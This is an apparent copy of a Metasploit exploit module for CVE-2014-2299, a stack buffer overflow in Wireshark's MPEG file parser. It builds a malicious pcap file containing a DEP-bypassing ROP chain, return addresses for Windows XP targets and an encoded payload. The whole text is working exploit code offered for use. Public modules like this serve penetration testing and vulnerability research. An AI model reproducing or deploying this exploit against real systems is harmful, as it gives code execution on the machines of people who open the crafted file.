Overflow
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
'Description'=> %q{
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
by generating an malicious file.)
},
'License'=> MSF_LICENSE,
'Author' =>
[
'Wesley Neelen',
'j0sm1',
],
'References' =>
[
[ 'CVE', '2014-2299'],
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
[ 'URL', 'https://www.securityfocus.com/bid/66066/info' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload'=>
{
'BadChars'=> "\xff",
'Space' => 600,
'DisableNops' => 'True',
'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00"
},
'Platform' => 'win',
'Targets'=>
[
[ 'WinXP SP3 Spanish (bypass DEP)',
{
'OffSet' => 69732,
'OffSet2' => 70476,
'Ret'=> 0x1c077cc3,
'jmpesp' => 0x68e2bfb9,
}
],
[ 'WinXP SP2/SP3 English(bypass DEP)',
{
'OffSet2' => 70692,
'OffSet' => 70476,
'Ret'=> 0x1c077cc3,
'jmpesp' => 0x68e2bfb9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Mar 20 2014'
))
register_options(
[
OptString.new('FILENAME', [ true, 'pcap file','mpeg_overflow.pcap']),
], self.class)
end
def create_rop_chain()
rop_gadgets =
[
0x61863c2a,
0x62d9027c,
0x61970969,
0x61988cf6,
0x619c0a2a,
0x61841e98,
0x6191d11a,
0x00000201,
0x5a4c1414,
0x00000040,
0x6197660f,
0x668242b9,
0x6199b8a5,
0x63a528c2,
0x61863c2a,
0x90909090,
0x6199652d,
].flatten.pack("V*")
return rop_gadgets
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ropchain = create_rop_chain
magic_header = "\xff\xfb\x41"
packet = rand_text_alpha(883)
packet << "\x6c\x7d\x37\x6c"
packet << "\x6c\x7d\x37\x6c"
packet << ropchain
packet << payload.encoded
packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
packet << make_nops(4)
packet << "\x6c\x2e\xe0\x68"
packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8)
packet << make_nops(4)
packet << "\x55\x59\x80\x6b"
print_status("Preparing payload")
filecontent = magic_header
filecontent << packet
print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
file_create(filecontent)
end
end